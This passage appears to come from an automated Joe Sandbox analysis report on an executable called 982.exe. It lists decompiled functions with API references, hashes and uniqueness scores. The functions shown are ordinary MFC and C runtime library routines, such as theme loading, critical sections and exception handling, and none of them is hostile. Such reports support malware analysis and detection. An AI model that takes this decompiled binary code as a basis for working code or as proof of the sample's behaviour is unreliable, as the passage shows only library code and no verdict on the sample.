                  • Instruction ID: 171b165ce9d76b4ccbe887691e2f84e0d0f934893f90d7a688ddd84e48c4f267
                  • Opcode Fuzzy Hash: b704c26b5200b5af27fe3e1943deedd6ed109bb7a919092fb28a7fe84f45fdf1
                  • Instruction Fuzzy Hash: 2A01D671A00118ABC711DF68FC89DEF77F9BF49300F0400BAB805D7151DA74DA458B99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00419E1D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E00419E1D(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x44be94; // 0xffffffff
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E0040DE5A( *((intOrPtr*)( *((intOrPtr*)(E0042083D(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E004281D0(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x44be94 = _t25;
				return _t25;
			}














                  0x00419e22
                  0x00419e2a
                  0x00419e2d
                  0x00419e90
                  0x00419e90
                  0x00419e2f
                  0x00419e30
                  0x00419e4c
                  0x00419e4e
                  0x00419e55
                  0x00419e5f
                  0x00419e6a
                  0x00419e6b
                  0x00419e76
                  0x00419e83
                  0x00419e83
                  0x00419e76
                  0x00419e85
                  0x00000000

                  APIs
                    • Part of subcall function 0040DE5A: GetModuleHandleW.KERNEL32(?,?,0040DF49,InitCommonControlsEx,00000000,?,0040E91C,00080000,00008000,?,?,00411504,?,00080000,?,?), ref: 0040DE68
                    • Part of subcall function 0040DE5A: LoadLibraryW.KERNEL32(?), ref: 0040DE78
                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00419E46
                  • _memset.LIBCMT ref: 00419E5F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc_memset
                  • String ID: DllGetVersion
                  • API String ID: 3385804498-2861820592
                  • Opcode ID: f990edd7b90837bfb691e0e49b1eafe7fde6d73e3fcf965a4a676ffe139966d0
                  • Instruction ID: 193bd892e458e3a2567373a02d605352cdaf0a9c3afde1a68bd8b9d8308924d3
                  • Opcode Fuzzy Hash: f990edd7b90837bfb691e0e49b1eafe7fde6d73e3fcf965a4a676ffe139966d0
                  • Instruction Fuzzy Hash: B4F06D72E003255AE710EBEDE945BAB73E89B54714F100176FA14E3291EAB8DD04C6E9
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Function 00420A0C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00420A0C(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v28;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongW(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameW(_t25,  &_v28, 0xa);
						_t16 = E0040CCD3( &_v28, L"combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E00427DFF(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                  0x00420a0c
                  0x00420a0c
                  0x00420a0c
                  0x00420a14
                  0x00420a1b
                  0x00420a1f
                  0x00420a24
                  0x00420a39
                  0x00000000
                  0x00420a3b
                  0x00420a42
                  0x00420a51
                  0x00420a59
                  0x00420a5c
                  0x00420a5c
                  0x00420a26
                  0x00420a26
                  0x00420a26
                  0x00420a26
                  0x00420a69

                  APIs
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00420A2D
                  • GetClassNameW.USER32(00000000,?,0000000A), ref: 00420A42
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClassLongNameWindow
                  • String ID: combobox
                  • API String ID: 1147815241-2240613097
                  • Opcode ID: 34dfe63172287794eead11c6e9921954037e172f79db84c3a66d5d6aa14a2302
                  • Instruction ID: aaf04745b86e9ae27989f5852ca24467dcb319f5cce2450581d6dffe9cb672e3
                  • Opcode Fuzzy Hash: 34dfe63172287794eead11c6e9921954037e172f79db84c3a66d5d6aa14a2302
                  • Instruction Fuzzy Hash: 3EF0F631B54228AF8B10EF64DC45DAF37E8DB26314B90012AE912E7181DA38A901879A
                  Uniqueness

                  Uniqueness Score: 0.80%

                  Function 0042CB7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37UNIQUELIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0042CB7C(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00427D4D(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0042C35A(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0042C35A(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00427D26(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0042C914(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                  0x0042cb7c
                  0x0042cb7c
                  0x0042cb7c
                  0x0042cb7c
                  0x0042cb7c
                  0x0042cb7f
                  0x0042cb85
                  0x0042cb93
                  0x0042cb99
                  0x0042cba1
                  0x0042cbad
                  0x0042cbb5
                  0x0042cbbd
                  0x0042cbd1
                  0x0042cbd3
                  0x0042cbd7
                  0x0042cbdc
                  0x0042cbe2
                  0x0042cbe4
                  0x0042cbe6
                  0x0042cbe9
                  0x00000000
                  0x0042cbf0
                  0x0042cbe4
                  0x0042cbd7
                  0x0042cbd1
                  0x0042cbbd
                  0x0042cbf1

                  APIs
                    • Part of subcall function 00427D4D: __getptd.LIBCMT ref: 00427D53
                    • Part of subcall function 00427D4D: __getptd.LIBCMT ref: 00427D63
                  • __getptd.LIBCMT ref: 0042CB8B
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __getptd.LIBCMT ref: 0042CB99
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 14633a8505cc3882590a50a846b846ba7a8c83d7331524ba590050f22346a0c5
                  • Instruction ID: 0cbbb72dd13075209c5625144a4683ca0efb724bc596f43a706353f9bb1d7182
                  • Opcode Fuzzy Hash: 14633a8505cc3882590a50a846b846ba7a8c83d7331524ba590050f22346a0c5
                  • Instruction Fuzzy Hash: AF018F35A002258ACF349F21F8C2A6EBBB4AF14311FD4481FF44166791CB78E981CF48
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00425AB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00425AB5(void* __ecx, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t12;
				void* _t14;
				void* _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;

				_push(0);
				E0042922B(E004397A3, _t14, _t17, __esi);
				if(( *0x44fc88 & 0x00000001) == 0) {
					 *0x44fc88 =  *0x44fc88 | 0x00000001;
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					_push(L"UxTheme.dll");
					 *0x44fc84 = E00411FDC(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
				}
				_t9 =  *0x44fc84; // 0x0
				_t19 =  *(_t20 + 0xc);
				if(_t9 != 0) {
					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
					if(_t12 != 0) {
						_t19 = _t12;
					}
				}
				return E00429303(_t19);
			}









                  0x00425ab5
                  0x00425abc
                  0x00425ac8
                  0x00425aca
                  0x00425ad1
                  0x00425ad5
                  0x00425ae0
                  0x00425ae0
                  0x00425ae5
                  0x00425aea
                  0x00425aef
                  0x00425af5
                  0x00425afd
                  0x00425aff
                  0x00425aff
                  0x00425afd
                  0x00425b08

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00425ABC
                  • GetProcAddress.KERNEL32(00000000,?,00000000,00425CC6,IsThemeBackgroundPartiallyTransparent,00425AAC,00000000,0041B7AC,?,00000006,00000000), ref: 00425AF5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: 61f8b749bbf5d3e9246c73834e40f20a120313d1abaad022ef29dd071299c023
                  • Instruction ID: 7853bb496fcbb30aa1a22ccfa39d02583c65b785d20387770a5527265191a08b
                  • Opcode Fuzzy Hash: 61f8b749bbf5d3e9246c73834e40f20a120313d1abaad022ef29dd071299c023
                  • Instruction Fuzzy Hash: 8DE06D387046289BEB149F79BD8674E3B947B09755F94007AFC04D72A0CB7D9D84C61C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00414C3E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00414C3E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HBRUSH__* _t9;
				intOrPtr _t19;
				void* _t20;

				_push(4);
				E0042922B(E00438D7B, __ebx, __edi, __esi);
				_t19 = __ecx;
				 *((intOrPtr*)(_t20 - 0x10)) = __ecx;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x43e9f8;
				_t9 = CreateSolidBrush( *(_t20 + 8));
				_t16 = __ecx;
				if(E00414938(__ebx, __ecx, __edi, _t9) == 0) {
					E0041414E(_t16);
				}
				return E00429303(_t19);
			}






                  0x00414c3e
                  0x00414c45
                  0x00414c4a
                  0x00414c4c
                  0x00414c4f
                  0x00414c56
                  0x00414c5a
                  0x00414c60
                  0x00414c67
                  0x00414c70
                  0x00414c72
                  0x00414c72
                  0x00414c7e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C45
                  • CreateSolidBrush.GDI32(?), ref: 00414C60
                    • Part of subcall function 0041414E: __CxxThrowException@8.LIBCMT ref: 00414164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BrushCreateException@8H_prolog3SolidThrow
                  • String ID: 6AA
                  • API String ID: 3804923923-924733298
                  • Opcode ID: ace8b4c388b8e683feadd32f2b01af37705470defeefcbf8ee1cee67da509f9c
                  • Instruction ID: f28505a04c46b7d3bee57340cd3067184a75c303514f2b237d264afdefa03fe1
                  • Opcode Fuzzy Hash: ace8b4c388b8e683feadd32f2b01af37705470defeefcbf8ee1cee67da509f9c
                  • Instruction Fuzzy Hash: 8DE08CB1601620ABDB21BFA5D90539E75A0AF5871AF00841EF6808E281DB7C8990879D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00414C40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00414C40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HBRUSH__* _t9;
				intOrPtr _t19;
				void* _t20;

				E0042922B(E00438D7B, __ebx, __edi, __esi);
				_t19 = __ecx;
				 *((intOrPtr*)(_t20 - 0x10)) = __ecx;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x43e9f8;
				_t9 = CreateSolidBrush( *(_t20 + 8));
				_t16 = __ecx;
				if(E00414938(__ebx, __ecx, __edi, _t9) == 0) {
					E0041414E(_t16);
				}
				return E00429303(_t19);
			}






                  0x00414c45
                  0x00414c4a
                  0x00414c4c
                  0x00414c4f
                  0x00414c56
                  0x00414c5a
                  0x00414c60
                  0x00414c67
                  0x00414c70
                  0x00414c72
                  0x00414c72
                  0x00414c7e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C45
                  • CreateSolidBrush.GDI32(?), ref: 00414C60
                    • Part of subcall function 0041414E: __CxxThrowException@8.LIBCMT ref: 00414164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BrushCreateException@8H_prolog3SolidThrow
                  • String ID: 6AA
                  • API String ID: 3804923923-924733298
                  • Opcode ID: 9592efd9e6a36dda905dbe8d45c820a00054e614137a69e1e340f278739cdb89
                  • Instruction ID: d17b30d93d62f7879bf83e398b08f0417c8272b7da9efe13bdfa06eefbf0116e
                  • Opcode Fuzzy Hash: 9592efd9e6a36dda905dbe8d45c820a00054e614137a69e1e340f278739cdb89
                  • Instruction Fuzzy Hash: CFE0C271601630ABC721BFB5D90539E75B0AF5871AF00841FF4808A181DF7C8990879D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041F4A6, Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 60%
                  			E0041F4A6(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0041F126( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                  0x0041f4ab
                  0x0041f4b0
                  0x0041f4b3
                  0x0041f4b8
                  0x0041f4ba
                  0x0041f4bd
                  0x0041f501
                  0x0041f501
                  0x0041f505
                  0x0041f50f
                  0x0041f515
                  0x0041f51e
                  0x0041f52a
                  0x0041f530
                  0x0041f536
                  0x0041f53a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041f4bf
                  0x0041f4bf
                  0x0041f4bf
                  0x0041f4c4
                  0x0041f4e1
                  0x0041f4e6
                  0x0041f4ec
                  0x0041f4ec
                  0x0041f4ee
                  0x0041f4f1
                  0x0041f4cf
                  0x0041f4cf
                  0x0041f4d6
                  0x0041f4d8
                  0x0041f4d8
                  0x0041f4d6
                  0x0041f4f5
                  0x0041f4f6
                  0x0041f4ff
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • EnterCriticalSection.KERNEL32(?), ref: 0041F505
                  • LeaveCriticalSection.KERNEL32(?,?), ref: 0041F515
                  • LocalFree.KERNEL32(?), ref: 0041F51E
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F530
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: 07886f9ab1872a406ab614c5873ea6e2d331d229a115a4cc32334d960cf05743
                  • Instruction ID: baa2f62964a8d9cda5b59eae2555c50a908fe22ae5862753cb71ba2bb861ffbd
                  • Opcode Fuzzy Hash: 07886f9ab1872a406ab614c5873ea6e2d331d229a115a4cc32334d960cf05743
                  • Instruction Fuzzy Hash: FF119731600205EFC720CF58C884F9AB3B4FF55315F20846EF546876A2CB79A896CB15
                  Uniqueness

                  Uniqueness Score: 0.25%

                  Function 00420C0D, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420C0D(signed int _a4) {
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t8;
				signed int _t9;
				intOrPtr* _t12;

				_t9 = _a4;
				if(_t9 >= 0x11) {
					_t4 = E00413DD0(_t8);
				}
				if( *0x44fa14 == 0) {
					_t4 = E00420BA4();
				}
				_t12 = 0x44fbc8 + _t9 * 4;
				if( *_t12 == 0) {
					EnterCriticalSection(0x44fbb0);
					if( *_t12 == 0) {
						_t4 = 0x44fa18 + _t9 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t12 =  *_t12 + 1;
					}
					LeaveCriticalSection(0x44fbb0);
				}
				EnterCriticalSection(0x44fa18 + _t9 * 0x18);
				return _t4;
			}








                  0x00420c15
                  0x00420c1b
                  0x00420c1d
                  0x00420c1d
                  0x00420c29
                  0x00420c2b
                  0x00420c2b
                  0x00420c36
                  0x00420c40
                  0x00420c47
                  0x00420c4c
                  0x00420c53
                  0x00420c59
                  0x00420c5f
                  0x00420c5f
                  0x00420c66
                  0x00420c66
                  0x00420c76
                  0x00420c7c

                  APIs
                  • EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                  • LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                  • String ID:
                  • API String ID: 3253506028-0
                  • Opcode ID: 832e1dd5d181bce55d1726a51741fa646c0df18bbef569af2e81ac0c40002f5d
                  • Instruction ID: 726fd355699d83bf9c671ec753497349cc40ea0b43e5465d5b206dd9d658a255
                  • Opcode Fuzzy Hash: 832e1dd5d181bce55d1726a51741fa646c0df18bbef569af2e81ac0c40002f5d
                  • Instruction Fuzzy Hash: 0EF04673B001245FDB209B56FD88727B7A9EBE2356F511037F48452253C738A880C6AE
                  Uniqueness

                  Uniqueness Score: 0.22%

                  Function 0041F009, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041F009(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x44f9d8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                  0x0041f010
                  0x0041f013
                  0x0041f013
                  0x0041f017
                  0x0041f01d
                  0x0041f022
                  0x0041f04b
                  0x0041f04c
                  0x00000000
                  0x0041f052
                  0x0041f024
                  0x0041f027
                  0x00000000
                  0x00000000
                  0x0041f02b
                  0x0041f033
                  0x00000000
                  0x0041f03a
                  0x0041f041
                  0x00000000
                  0x0041f047

                  APIs
                  • EnterCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F017
                  • TlsGetValue.KERNEL32(0044F9BC,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F02B
                  • LeaveCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F041
                  • LeaveCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F04C
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 06bc84e5ea9d556fbb0cc2e9183b6dda3bb31e761f301a2a15e135e5e8b5964b
                  • Instruction ID: aee2dc97dfc1ab292c8d8f421becaba72ae4a631ad10b94ea4477e52f24ac0d1
                  • Opcode Fuzzy Hash: 06bc84e5ea9d556fbb0cc2e9183b6dda3bb31e761f301a2a15e135e5e8b5964b
                  • Instruction Fuzzy Hash: 0BF0B4762405009FC7204F25DC88C977BADEA8836031A4476F84283223D639F84A8A96
                  Uniqueness

                  Uniqueness Score: 0.21%

                  Analysis Process: 982.exe PID: 3668 Parent PID: 3644 982.exeUNIQUE

                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:6%
                  Total number of Nodes:448
                  Total number of Limit Nodes:2

                  Graph

